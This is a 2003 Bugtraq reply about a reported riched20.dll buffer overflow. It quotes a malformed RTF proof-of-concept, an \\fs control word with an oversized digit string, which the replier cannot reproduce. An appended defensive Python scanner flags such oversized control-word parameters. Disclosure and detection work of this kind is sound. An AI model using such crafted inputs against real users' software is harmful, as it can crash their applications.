Re: Riched20.DLL attribute label buffer overflow vulnerability

From: 3APA3A (3APA3Aat_private)
Date: Tue Feb 18 2003 - 00:36:59 PST


    Dear Jie Dong,
    
    Can't reproduce it on riched20.dll v.3.0 (5.30.23.1200) under NT.
    
    --Sunday, February 16, 2003, 4:30:50 PM, you wrote to bugtraqat_private:
    
    
    JD> The following RTF file may result in illegal operation:
    JD> {\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
    JD> \fnil\fprq2\fcharset134        \'cb\'ce\'cc\'e5;}}        {\colortbl
    JD> ;\red255\green0\blue255;}        \viewkind4\uc1\pard\cf1\kerning2\f0
    JD> \fs18121111111111111111111111111111111110000
    JD> www.yoursft.com\fs20\par  }  "\fs"  was used for setting the size of
    
    
    -- 
    ~/ZARAZA
    Man is a mystery... I occupy myself with this mystery in order to be a human being. (Dostoevsky)
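
A defensive pre-filter for the kind of input quoted above (a control word such as "\fs" followed by an abnormally long digit string), added here as an example; it is not code from either poster or from the vendor. The thresholds, the function name scan_rtf and the sample bytes are assumptions: the limits follow the RTF specification's usual 16-bit parameter range and 32-letter control word names, and the sample is constructed.

```python
import re

# One RTF token after a backslash: a control word with an optional signed
# decimal parameter, a \'hh hex escape, or a one-character control symbol.
# Consuming "\\" as a control symbol keeps escaped text from being misread.
TOKEN = re.compile(rb"\\(?:([A-Za-z]+)(-?\d+)?|'[0-9A-Fa-f]{2}|.)", re.DOTALL)

MAX_DIGITS = 5       # assumption: -32767..32767 needs at most 5 digits
MAX_BIN_DIGITS = 10  # assumption: \binN carries a 32-bit byte count
MAX_NAME_LEN = 32    # assumption: control word names are at most 32 letters


def scan_rtf(data: bytes, max_digits: int = MAX_DIGITS):
    """Return (offset, control_word, reason) for each suspicious control word."""
    findings = []
    pos = 0
    while True:
        m = TOKEN.search(data, pos)
        if m is None:
            return findings
        pos = m.end()
        name, param = m.group(1), m.group(2)
        if name is None:
            continue  # control symbol or hex escape, nothing to measure
        digits = len(param.lstrip(b"-")) if param else 0
        if name == b"bin" and digits <= MAX_BIN_DIGITS:
            # Skip the raw payload so binary bytes are not parsed as RTF.
            if data[pos:pos + 1] == b" ":
                pos += 1
            pos += max(int(param or 0), 0)
            continue
        word = name[:MAX_NAME_LEN].decode("ascii")
        if len(name) > MAX_NAME_LEN:
            findings.append((m.start(), word, "name has %d letters" % len(name)))
        if digits > max_digits:
            findings.append((m.start(), word, "parameter has %d digits" % digits))


# Constructed sample: a minimal document whose \fs parameter is 40 digits long.
SAMPLE = (b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0\\fnil Arial;}}\\pard\\f0\\fs"
          + b"1" * 40 + b" text\\fs20\\par}")

if __name__ == "__main__":
    for offset, word, reason in scan_rtf(SAMPLE):
        print("offset %d: \\%s: %s" % (offset, word, reason))
```

A finding means the file should be rejected or quarantined before it reaches a rich-edit control; it does not say whether a given riched20.dll build is affected.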
    


